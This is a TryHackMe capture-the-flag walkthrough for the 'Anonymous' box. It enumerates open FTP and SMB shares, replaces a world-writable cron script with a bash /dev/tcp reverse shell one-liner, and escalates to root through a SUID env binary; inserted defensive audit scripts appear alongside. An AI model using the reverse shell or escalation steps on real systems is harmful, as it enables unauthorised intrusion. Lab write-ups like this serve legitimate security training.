Anonymous - TryHackMe Walkthrough

“Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.”

This is a TryHackMe box. To access this you must sign up to

URL: Anonymous

Difficulty: Medium

Author: Nameless0ne


We are given the IP. Run an nmap scan with the following command:

nmap -p- -A -T4 -o portscan

Here are the open ports:

21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04 19:26 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

I will start by investigating the FTP port (21). According to our portscan, Anonymous login is allowed:

Anonymous FTP login allowed

So let’s see what is on the FTP server:


There is a directory called scripts.


Transfer all the files over to the local machine so we can inspect them.

get removed_files.log
get to_do.txt




echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

This looks like a script to clear up files in /tmp.


The script uses removed_files.log as its log.

Moving on to the next port: we don’t have any credentials for SSH, so let’s investigate the two SMB ports.

I used smbclient, an “ftp-like” client to access SMB/CIFS resources on servers, to get a list of the available shares and began to enumerate them for information.

smbclient -L \\anonymous -I


Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
pics            Disk      My SMB Share Directory for Pics
IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))

The disk share “pics” looks interesting. It says it is used as a directory for “pics”.

Let’s explore this share.

smbclient //


I transferred these over as I did with the FTP files; they are just pictures of dogs.




The only interesting file I found was the script on the FTP server. This script could potentially be a cron job which we could modify to execute our own code.

The software utility cron is a time-based job scheduler in Unix-like computer operating systems.

Since the FTP server allows anyone to log in, we can upload our own script with an identical name. So let’s start by creating our own script on our local machine.
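The weakness here is a scheduled script sitting in a directory anyone can write to (scripts is drwxrwxrwx in the scan). The following audit is an added example, not part of the original walkthrough: it walks a job's path and reports every component that is group- or world-writable. The function names, the file name cleanup.sh and the fixture layout are assumptions constructed for the demonstration.

```shell
#!/bin/sh
# Added example (defensive audit): a scheduled script is only as safe as the
# least-protected component of its path.

# Print each path component between the script and stop_dir (exclusive) that
# is group- or world-writable. Exit status 0 means at least one was found.
writable_components() {
    local path="$1" stop_dir="${2:-/}" found=1
    while [ "$path" != "$stop_dir" ] && [ "$path" != "/" ] && [ "$path" != "." ]; do
        # -L follows symlinks, whose own mode bits are always rwxrwxrwx.
        if [ -n "$(find -L "$path" -prune \( -perm -0002 -o -perm -0020 \) -print 2>/dev/null)" ]; then
            printf '%s\n' "$path"
            found=0
        fi
        path=$(dirname "$path")
    done
    return "$found"
}

# Constructed fixture: one copy of a hypothetical cleanup.sh under a
# world-writable var/ftp/scripts, one under a locked-down usr/local/sbin.
make_fixture() {
    local base
    base=$(mktemp -d) || return 1
    mkdir -p "$base/var/ftp/scripts" "$base/usr/local/sbin"
    : > "$base/var/ftp/scripts/cleanup.sh"
    : > "$base/usr/local/sbin/cleanup.sh"
    chmod 755 "$base/var" "$base/var/ftp" "$base/usr" "$base/usr/local" \
              "$base/usr/local/sbin"
    chmod 777 "$base/var/ftp/scripts"
    chmod 755 "$base/var/ftp/scripts/cleanup.sh" "$base/usr/local/sbin/cleanup.sh"
    printf '%s\n' "$base"
}
```

The first copy is flagged even though the file itself is mode 755: write access to the parent directory is enough to replace it.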

Refer to this article for a reverse shell cheatsheet:

Reverse Shell Cheatsheet - CyberGoat

We’ll be using this one-liner:

bash -i >& /dev/tcp/[YOUR TRYHACKME IP ADDRESS]/4444 0>&1

Look at your interfaces with ifconfig; your TryHackMe IP should be on interface “tun0” or similar.

Create the file:



bash -i >& /dev/tcp/ 0>&1

Connect to the FTP server again:

cd scripts

put ftp

Now set up a netcat listener on the specified port:

nc -nvlp 4444

I almost immediately got a connection:


I am logged in as “namelessone”. The user flag is in the user’s home directory:


Privilege Escalation

Pretty straightforward so far: we just modified the script to get a reverse shell.

sudo -l doesn’t work so let’s check the SUID binaries. If you are unsure about finding and exploiting SUID binaries, I recommend reading this article:

Null Byte - Exploit SUID Binaries

And here is a very recent TryHackMe box which included the exploitation of a SUID Binary:

CyberGoat - BoilerCTF TryHackMe

To get a list of all SUID binaries, execute the following command:

find / -user root -perm -4000 -print 2>/dev/null

This returns a rather large list of binaries:


GTFOBins is an excellent website which has compiled a list of exploitable SUID binaries. Use this as a reference:


One of the binaries on our system is “/usr/bin/env”. GTFOBins has a page on this binary:

GTFOBins /env

Let’s take advantage of this. We can run the following from our current user shell:

/usr/bin/env /bin/sh -p


We are root; the flag is in /root/root.txt.
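The root cause of this step is a setuid bit on a general-purpose program. The following audit is an added example, not part of the original walkthrough: it compares the setuid files under a directory with a baseline and singles out programs that execute other commands. The function names, the RUNS_COMMANDS list, the baseline file format and the backup-tool name are assumptions constructed for the demonstration.

```shell
#!/bin/sh
# Added example (defensive audit): setuid files compared against a baseline.

# Constructed short list of general-purpose programs that execute other
# commands; env is the one this box ships setuid.
RUNS_COMMANDS="env sh bash dash find perl python3"

# $1 = directory to scan, $2 = baseline file (one expected setuid path per line).
# Prints "CRITICAL <path>" for an unlisted setuid command runner and
# "UNEXPECTED <path>" for any other setuid file missing from the baseline.
audit_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        if grep -Fxq -- "$f" "$2"; then
            continue
        fi
        case " $RUNS_COMMANDS " in
            *" $(basename "$f") "*) printf 'CRITICAL %s\n' "$f" ;;
            *) printf 'UNEXPECTED %s\n' "$f" ;;
        esac
    done
}

# Constructed fixture: env and a hypothetical backup-tool carry the setuid
# bit; passwd is the only setuid file the baseline expects.
make_suid_fixture() {
    local base
    base=$(mktemp -d) || return 1
    mkdir -p "$base/usr/bin"
    for name in env passwd backup-tool ls; do
        : > "$base/usr/bin/$name"
    done
    chmod 4755 "$base/usr/bin/env" "$base/usr/bin/passwd" "$base/usr/bin/backup-tool"
    chmod 755 "$base/usr/bin/ls"
    printf '%s\n' "$base/usr/bin/passwd" > "$base/baseline.txt"
    printf '%s\n' "$base"
}
```

On a real host the baseline would come from a known-good build, and a confirmed finding is cleared with chmod u-s on the file.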


This was a relatively easy box; I wouldn’t personally rate it medium. It is good for beginners who want to improve their enumeration and privilege escalation skills.

Written on June 9, 2020